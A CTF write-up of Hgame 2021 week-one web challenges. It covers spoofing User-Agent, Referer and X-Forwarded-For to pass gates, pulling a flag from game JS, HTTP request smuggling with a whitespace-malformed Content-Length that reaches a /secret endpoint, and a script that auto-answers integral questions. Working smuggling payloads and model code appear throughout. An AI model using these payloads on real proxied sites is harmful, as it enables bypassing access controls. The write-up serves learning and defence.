Hgame2021 week1 web

Preface

This was my first time playing Hgame. The challenges were very interesting and I learned a lot. I thought the first week's challenges would be simple, but it turned out I was just too weak: 3 challenges (really 2) hit my own knowledge blind spots. The official WP has come out now, so I can study them on my own.
But one thing has to be said: why do the second week's web challenges feel easier than the first week's? Fortunately, in the second week only one XSS challenge was a front-end one, and that was the one I GG'd on; the other back-end challenges were quite simple.
Week one showed that I still don't know much about the front end or the HTTP protocol, so I'll have to learn them slowly.

Hitchhiking_in_the_Galaxy

This one mainly tests the HTTP protocol; the first week mainly tests HTTP and the front end, neither of which I know well.
Visiting HitchhikerGuide.php returns 405 Method Not Allowed, so change the method to POST.
Then it says you can only access here using the "Infinite Improbability Drive".
Change the UA header: User-Agent: Infinite Improbability Drive
and then you get this:

Did you know? <a href="https://github.com/wuhan005">茄子</a> specifically requires that you come from his <a href="https://cardinal.ink/">Cardinal</a>

So set the Referer header: Referer: https://cardinal.ink/

Finally it says the flag can only be fetched locally, so add the XFF header: X-Forwarded-For: 127.0.0.1
and get the flag. These are all common tricks.
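As an added example (not the challenge's source), here is a small model of the four gates in the order the page reveals them, together with the reason the last one is not really an access control: X-Forwarded-For is just a request header, so the client can set it to 127.0.0.1 itself. The hardened variant only honours the header when the TCP peer is a known proxy (the address 10.0.0.2 and the hint strings below are constructed for the demo).

```python
from dataclasses import dataclass, field

TRUSTED_PROXY = "10.0.0.2"   # constructed: the only peer allowed to set XFF
FLAG = "hgame{...}"          # placeholder, not the real flag


@dataclass
class Request:
    method: str
    remote_addr: str            # TCP peer address; the client cannot forge this
    headers: dict = field(default_factory=dict)

    def header(self, name: str):
        """Case-insensitive lookup, since HTTP header names are case-insensitive."""
        for k, v in self.headers.items():
            if k.lower() == name.lower():
                return v
        return None


def client_ip_naive(req: Request) -> str:
    """Vulnerable: trusts X-Forwarded-For from any peer, so anyone can claim 127.0.0.1."""
    return req.header("X-Forwarded-For") or req.remote_addr


def client_ip_hardened(req: Request) -> str:
    """Honour XFF only when the TCP peer is our own proxy, and use the address that
    proxy appended (the last element), not whatever the client put at the front."""
    xff = req.header("X-Forwarded-For")
    if xff and req.remote_addr == TRUSTED_PROXY:
        return xff.split(",")[-1].strip()
    return req.remote_addr


def guide(req: Request, client_ip=client_ip_naive) -> str:
    """The gate chain in the order the challenge reveals it. The hint strings are
    paraphrased from the page, not the server's exact output."""
    if req.method != "POST":
        return "405 Method Not Allowed"
    if req.header("User-Agent") != "Infinite Improbability Drive":
        return "Only by using Infinite Improbability Drive can you access here"
    if req.header("Referer") != "https://cardinal.ink/":
        return "You have to come from Cardinal"
    if client_ip(req) != "127.0.0.1":
        return "Only local access can get the flag"
    return FLAG


def solve_headers() -> dict:
    """The header set that walks every gate of the naive checker."""
    return {
        "User-Agent": "Infinite Improbability Drive",
        "Referer": "https://cardinal.ink/",
        "X-Forwarded-For": "127.0.0.1",
    }


if __name__ == "__main__":
    attacker = Request("POST", "203.0.113.5", solve_headers())
    print("naive   :", guide(attacker))                      # flag
    print("hardened:", guide(attacker, client_ip_hardened))  # denied
```

With the hardened lookup the attacker's forged header is ignored because the TCP peer is not the proxy, and a request that really did pass through the proxy carries the true client address as the last XFF element.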

watermelon

For the Big Watermelon game the normal approach is to review the JS, find the final success condition, and then either trigger success by hand or read the flag directly. But for this challenge I searched the whole JS and still couldn't find the code that checks for 2000 points.
You can refer to this Zhihu answer: Is there any trick to the mini-game "Synthetic Big Watermelon"?
I don't know the front end, and I really didn't know the JS code could be found here:
The key code is in project.js:
Decode the base64 to get the flag. Having learned this, the front end won't be quite so miserable for me...

Treasure smuggler

The knowledge point tested is HTTP request smuggling, which was also a blind spot for me; it's great to learn something new.
The reference article is the hint, written in great detail, and I learned a lot from it: Protocol layer attack - HTTP request smuggling

After reading that article you get a rough understanding. You can think of a CL-TE attack, or the approach of the first patch mentioned in the article.
But I didn't succeed at the time and was very confused. After the WP came out I followed the masters' WP to reproduce it: the request was exactly the same but still failed, which was infuriating. In the end I discovered that Burp's automatic Content-Length update needs to be turned off:
after turning it off and reproducing again, it works.
First, the attack with a space after Content-Length. The article explains the principle clearly: when the ATS front end receives a request in which there is whitespace between a header name and the colon, it neither returns 400 nor normalises the header, but forwards the request to the back end as-is. A back end such as nginx ignores such a Content-Length, so the request the back end actually sees is:

GET / HTTP/1.1
Host: thief.0727.site


GET /secret HTTP/1.1
Host:thief.0727.site
client-ip:127.0.0.1
foo:

This is treated as two requests. The first one is complete because it ends with a blank line (\r\n\r\n). The second one has no terminating \r\n\r\n, so the back end considers it incomplete: it responds to the first request and then waits for more data before responding to the second.
Now send one more request, and it gets spliced onto the pending one like this:

GET /secret HTTP/1.1
Host:thief.0727.site
client-ip:127.0.0.1
foo:GET / HTTP/1.1
Host: thief.0727.site

That request succeeded, and the HTTP smuggling worked.
CL-TE also failed for me... even following the masters' and the official WP I still couldn't get it to work.

Smuggler's anger

To prevent hitchhiking, another challenge was added. I still tried the attack with a space between Content-Length and the colon, but it returns 400. The masters say it's because of the two Host headers: for this challenge the front end adds a client-ip header itself:

GET / HTTP/1.1
Host: police.liki.link
Content-Length : 71


GET /secret HTTP/1.1
Client-ip:127.0.0.1
Host: police.liki.link
a:

Once the follow-up request is appended, the back end probably sees this:

GET / HTTP/1.1
Host: police.liki.link
Content-Length : 71


GET /secret HTTP/1.1
Client-ip:127.0.0.1
Host: police.liki.link
a:GET / HTTP/1.1
Host: police.liki.link
client-ip:xxxxxx

The proxy's client-ip at the end overrides the one we constructed, and two Host headers produce a 400. The masters' fix is to make the follow-up request land in the body of the smuggled request, by giving that request its own Content-Length:

GET / HTTP/1.1
Host: police.liki.link
Content-Length : 94


GET /secret HTTP/1.1
Client-ip:127.0.0.1
Host: police.liki.link
Content-length:100

aaa

In this way the follow-up request's content is spliced into the body of GET /secret HTTP/1.1 instead of its header block, and the smuggling succeeds.
However, CL-TE didn't work for me on either of these two challenges, even when I copied the same payload exactly. Maybe something's wrong with my local setup; nothing to be done.
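As an added example, and not code from the challenge or the WPs, here is a toy model of the desync used in both Treasure smuggler and Smuggler's anger. The "lenient" parser stands in for the ATS front end, which trims the header name so that "Content-Length : N" counts, and the strict parser stands in for the back end, which the page says ignores that header. It also computes the Content-Length itself, which is the number Burp's auto-update was silently rewriting. The hostnames, the follow-up request's headers and the proxy-added client-ip address 10.0.0.5 are constructed for the demo; the simplified parsers are a model, not ATS or nginx behaviour in every detail.

```python
def build_smuggle_request(host: str, smuggled: bytes) -> bytes:
    """Wrap `smuggled` in a GET / whose malformed Content-Length covers it.
    The length is computed here; with Burp's auto-update off this is the
    number you otherwise have to get right by hand."""
    head = (f"GET / HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length : {len(smuggled)}\r\n\r\n")   # note the space before ':'
    return head.encode() + smuggled


def parse_requests(stream: bytes, lenient: bool) -> list:
    """Split `stream` into requests the way one hop would see them.
    lenient=True  trims whitespace from header names (front-end model).
    lenient=False drops headers whose name has surrounding whitespace (back-end model).
    Each entry: line, headers (last value wins), host_lines, body, complete."""
    out, pos = [], 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            # No blank line yet: this hop waits, and whatever arrives next on
            # the connection is glued onto the pending request.
            out.append({"line": stream[pos:].split(b"\r\n")[0].decode("latin-1"),
                        "headers": {}, "host_lines": 0, "body": b"", "complete": False})
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers, host_lines = {}, 0
        for line in lines[1:]:
            name, _, value = line.partition(":")
            if name != name.strip():
                if not lenient:
                    continue                 # strict hop ignores the malformed name
                name = name.strip()
            name = name.lower()
            if name == "host":
                host_lines += 1
            headers[name] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        body = stream[body_start:body_start + length]
        out.append({"line": lines[0], "headers": headers, "host_lines": host_lines,
                    "body": body, "complete": len(body) == length})
        pos = body_start + length
    return out


def forwarded_follow_up(host: str) -> bytes:
    """Our next request as the front end forwards it: the proxy has appended
    its own client-ip (constructed value) after the headers we sent."""
    return (f"GET / HTTP/1.1\r\nHost: {host}\r\nUser-Agent: Mozilla/5.0\r\n"
            f"Accept: */*\r\nConnection: keep-alive\r\n"
            f"client-ip: 10.0.0.5\r\n\r\n").encode()


def frontend_view(host: str) -> list:
    """The front end honours the Content-Length and sees one ordinary request."""
    return parse_requests(build_smuggle_request(host, b"GET /secret HTTP/1.1\r\nfoo:"),
                          lenient=True)


def naive_attack(host: str) -> list:
    """Treasure smuggler style: a dangling 'foo:' header line swallows the
    follow-up's request line, but the follow-up's own Host and client-ip headers
    still land in the smuggled request's header block."""
    smuggled = (f"GET /secret HTTP/1.1\r\nHost: {host}\r\n"
                f"client-ip: 127.0.0.1\r\nfoo:").encode()
    stream = build_smuggle_request(host, smuggled) + forwarded_follow_up(host)
    return parse_requests(stream, lenient=False)


def body_attack(host: str, swallow: int = 100) -> list:
    """Smuggler's anger style: give the smuggled request its own Content-Length so
    the whole follow-up lands in its body. `swallow` must not exceed the bytes
    that will actually arrive, otherwise the back end keeps waiting."""
    smuggled = (f"GET /secret HTTP/1.1\r\nClient-ip: 127.0.0.1\r\nHost: {host}\r\n"
                f"Content-Length: {swallow}\r\n\r\naaa").encode()
    stream = build_smuggle_request(host, smuggled) + forwarded_follow_up(host)
    return parse_requests(stream, lenient=False)


if __name__ == "__main__":
    for req in body_attack("police.liki.link"):
        print(req["line"], req["headers"].get("client-ip"), req["complete"])
```

Running the naive variant against the "police" model shows exactly the failure the page describes: the smuggled /secret request ends up with two Host lines and with client-ip overwritten by the proxy's value. The body variant keeps one Host line and our 127.0.0.1, because everything the proxy appended is consumed as body bytes; whatever is left over after the 100 bytes becomes a junk third request, which is why the chosen length must be large enough to cover the proxy's additions but not larger than what arrives.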

IQ test chicken

In fuckmath.js you can see the useful JS: check status, get flag, get question and submit answer; the API is written very clearly.
getQuestion returns roughly this:

<math>
	<mrow>
		<msubsup>
			<mo></mo>
			<mrow>
				<mo>-</mo>
				<mn>92</mn>
			</mrow>
			<mrow>
				<mn>31</mn>
			</mrow>
		</msubsup>
		
		<mo>(</mo>
		<mn>12</mn>
		<mi>x</mi>
		<mo>+</mo>
		<mn>17</mn>
		<mo>)</mo>
		<mtext>
			<mi>d</mi>
		</mtext>
		<mi>x</mi>
		<mtd/>
	</mrow>
</math>

Since the integrands are all of the form ax+b, the formula is always the same and it could actually be computed by hand (escape). Of course, writing a script is easy: read the lower and upper limits of the integral and a and b, then apply the integration formula. I wrote it that way, but when writing this WP I found the script had been deleted...
I looked at the WP, which used Python's sympy library to compute the integral, and learned from it to rewrite the script.

# @Author:feng
import json
import requests
from lxml import etree
from sympy import symbols, integrate

url = "http://r4u.top:5000/"
session = requests.session()   # keep the session cookie so the server counts our answers
count = 0
while count < 100:
    question = session.get(url=url + "api/getQuestion")
    question = json.loads(question.text)['question']
    question = etree.HTML(question)

    # lower limit: first <mrow> under <msubsup>; a leading <mo> is the minus sign
    xia_fuhao = question.xpath('//math/mrow/msubsup/mrow[1]/mo/text()')
    xiaxian = int(question.xpath('//math/mrow/msubsup/mrow[1]/mn/text()')[0])
    if len(xia_fuhao) != 0:
        xiaxian = -xiaxian
    # upper limit: second <mrow>, same layout
    shang_fuhao = question.xpath('//math/mrow/msubsup/mrow[2]/mo/text()')
    shangxian = int(question.xpath('//math/mrow/msubsup/mrow[2]/mn/text()')[0])
    if len(shang_fuhao) != 0:
        shangxian = -shangxian   # negate the number, not the <mo> list

    # integrand ax+b: the two <mn> that are direct children of the outer <mrow>
    a = int(question.xpath('//math/mrow/mn[1]/text()')[0])
    b = int(question.xpath('//math/mrow/mn[2]/text()')[0])

    x = symbols('x')
    answer = float(integrate(a * x + b, (x, xiaxian, shangxian)))
    headers = {
        "Content-Type": "application/json;charset=UTF-8"
    }
    data = {
        'answer': answer
    }
    r = session.post(url=url + "api/verify", headers=headers, json=data)
    #print(r.text)
    count += 1
r = session.get(url=url + "api/getFlag")
print(r.text)
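As an added example (my own code, not the script above or the WP's), here is the parsing and integration step on its own, using only the standard library so it can be checked offline against the page's sample question. It goes slightly beyond the page's case: it reads the sign of the constant term from the <mo> between the two numbers, so an integrand like 12x-17 works too, and it uses the closed form a/2·(u²-l²)+b·(u-l) instead of sympy. The HTTP loop around it would be the same as in the script above.

```python
import xml.etree.ElementTree as ET

# The sample question from the page; the empty <mo> is where the integral sign
# was lost in extraction, and the parser never reads it.
SAMPLE = """<math><mrow><msubsup><mo></mo>
<mrow><mo>-</mo><mn>92</mn></mrow><mrow><mn>31</mn></mrow></msubsup>
<mo>(</mo><mn>12</mn><mi>x</mi><mo>+</mo><mn>17</mn><mo>)</mo>
<mtext><mi>d</mi></mtext><mi>x</mi><mtd/></mrow></math>"""


def parse_bound(mrow) -> int:
    """A limit is <mrow>[<mo>-</mo>]<mn>N</mn></mrow>; a leading <mo>-</mo> negates it."""
    negative = any(mo.text == "-" for mo in mrow.findall("mo"))
    value = int(mrow.find("mn").text)
    return -value if negative else value


def parse_question(mathml: str):
    """Return (lower, upper, a, b) for a question of the form ∫ (a*x + b) dx."""
    root = ET.fromstring(mathml)
    mrow = root.find("mrow")
    lower_row, upper_row = mrow.find("msubsup").findall("mrow")
    coeffs, sign = [], 1
    for child in mrow:                 # direct children only, i.e. the integrand
        if child.tag == "mo" and child.text in ("+", "-"):
            sign = 1 if child.text == "+" else -1
        elif child.tag == "mn":
            coeffs.append(sign * int(child.text))
            sign = 1
    a, b = coeffs
    return parse_bound(lower_row), parse_bound(upper_row), a, b


def integrate_linear(lower: int, upper: int, a: int, b: int) -> float:
    """Closed form of the definite integral of a*x+b from lower to upper."""
    return a / 2 * (upper ** 2 - lower ** 2) + b * (upper - lower)


def solve(mathml: str) -> float:
    """Answer for one getQuestion payload."""
    return integrate_linear(*parse_question(mathml))


if __name__ == "__main__":
    print(parse_question(SAMPLE), solve(SAMPLE))
```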

Also refer to this master's script:
hgame2021 week1 writeup

Origin blog.csdn.net/rfrder/article/details/113754076